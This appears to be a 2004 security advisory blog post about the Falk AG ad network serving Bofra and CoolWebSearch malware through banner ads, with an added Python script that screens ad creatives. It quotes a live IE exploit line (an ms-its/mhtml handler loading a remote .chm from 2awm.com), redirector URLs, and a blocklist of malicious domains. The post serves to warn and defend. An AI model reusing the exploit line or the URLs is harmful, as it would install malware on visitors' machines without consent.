Falk AG / falkag.net Serving Viruses and Trojans
22nd November 2004
(Note: this relates to incidents that happened
in 2004 - to the best of our knowledge, Falk AG has
not had these problems since then)
Falk AG is a major European advertising network serving
up a variety of ads, including .ASP based advertisements.
Falk AG is a legitimate and above-board advertising
company, but it seems that some of the ads they have
served in the past conceal trojans and other malware,
caused either by disreputable advertisers or by serious
security breaches.
On 21st November 2004, popular IT news site The
Register reported that Falk AG had apparently been
serving ads with the Bofra virus on their site (see
this report).
Early on Saturday morning some banner advertising
served for The Register by third party ad serving
company Falk AG became infected with the Bofra/IFrame
exploit. The Register suspended ad serving by this
company on discovery of the problem. [...]
We have asked Falk for an explanation and
for further details of the incident, and pending
this we do not intend to restart ad-serving via
the company. Falk will, we understand, be making
a statement regarding the matter on Monday.
Falk AG claim that they were hacked, but this
is not the first time this has happened. We posted this report
to the Parasiteware board back in September 2004:
Falk eSolutions AG - http://www.falkag.de/
- is a German advertising network that allows .ASP
based ads. They're not very picky about their advertisers,
though; they seem to allow everyone from scumware
pushers to blue chip customers on.
Here's a nasty little scumware trail.
Comingsoon.net is a popular movies site (Alexa
rank 8643). It buys advertising from Falk AG - typically
routing through falkag.net. [...]
One of these is a popup banner for an outfit
called ntsearch.com based in Russia. [...]
The redirector I get is http:// www.ntsearch.com
/uk_in.php?acc=zon10 DO NOT VISIT THIS
This bounced through 64.246.46.32 (EV1.NET)
to http:// 2awm.com/ 309.php DO NOT VISIT THIS
based in the Czech Republic:
What we get on the 2awm.com server is a line
containing:
document.write(cxw.value.replace("${PR}","ms-its:mhtml:file://c:\\nosuch.mht!http://www.2awm.com/file/309.chm::/1.htm"))
REALLY REALLY DON'T CLICK THIS
This uses a well-known IE exploit to install
some sort of crapware. In this case it looks like
a variant of CoolWebSearch (CWS) (i.e. about the
worst trojan you can get).
[...]
At no point was the user asked permission
to install this software. The originating site (Comingsoon.net)
is only guilty of making a bad choice of advertising
network. Apart from the obvious wrongdoing by the
CWS pushers, it's clear that Falk AG is happy to
take the money from the scumware merchants.
Other suspect domains
These are hosted on the Ukrainian server:
* 2awm.com
* Awmgate.com
* Check-wire.com
* Lab-wire.com
* Online-more.com
* Find-by-web.com
* Search4www.com
falkag.net seems to split traffic between
US and European targeted servers:
* as-us.falkag.net ~ 60%
* as-eu.falkag.net ~ 40%
If you're a network administrator, I'd suggest
blocking access to all of falkag.net.
If you're an advertiser, I'd suggest reconsidering
your relationship, and if you're a publisher I would
pull those ads right now before you get the blame
for spreading spyware.
The underlying problem, as we see it, is that Falk AG allows
a wide variety of ad types, and because of the inherent
security flaws in Internet Explorer there are several
ways that Falk AG "customers" can exploit those
vulnerabilities. Falk AG should therefore be employing
some sort of screening process, but it appears that
it does not.
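As an added illustration (not code from the original post or from Falk AG), here is the kind of creative-screening check the paragraph above calls for: it flags ad creatives that reference the ms-its:/mhtml: handlers, local file:// paths or .chm payloads seen in the 2awm.com snippet, or that link to hosts on a blocklist. The blocklist is built from the domains named on this page and the sample creatives are constructed for the example.

```python
"""Screening check for third-party ad creatives (added example)."""
import re
from urllib.parse import urlsplit

# Domains this page names as suspect, plus falkag.net as the post advises blocking.
# A real deployment would maintain its own list.
BLOCKLIST = {
    "2awm.com", "awmgate.com", "check-wire.com", "lab-wire.com",
    "online-more.com", "find-by-web.com", "search4www.com",
    "ntsearch.com", "falkag.net",
}

# Constructs that have no business appearing in a display ad.
RISKY_PATTERNS = {
    "ms-its-handler": re.compile(r"ms-its:", re.I),
    "mhtml-handler": re.compile(r"mhtml:", re.I),
    "chm-payload": re.compile(r"\.chm\b", re.I),
    "local-file-uri": re.compile(r"file://", re.I),
}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)

def in_blocklist(host):
    """True if host is a listed domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BLOCKLIST)

def screen_creative(creative):
    """Return a sorted list of findings for one creative (empty list = clean)."""
    findings = set()
    for name, pattern in RISKY_PATTERNS.items():
        if pattern.search(creative):
            findings.add(name)
    for url in URL_RE.findall(creative):
        host = urlsplit(url).hostname or ""
        if in_blocklist(host):
            findings.add("blocklisted-host:" + host)
    return sorted(findings)

# Constructed samples: a plain banner and one shaped like the 2awm.com line.
BENIGN = '<a href="https://example.com/promo"><img src="https://cdn.example.com/b.gif"></a>'
MALICIOUS = ('document.write(cxw.value.replace("${PR}","ms-its:mhtml:file://c:\\\\nosuch.mht'
             '!http://www.2awm.com/file/309.chm::/1.htm"))')

if __name__ == "__main__":
    for label, creative in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, screen_creative(creative) or "clean")
```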
Our advice remains unchanged: network administrators
should block access to the falkag.net servers at their
firewalls and web site operators should remove Falk
AG ads from their sites.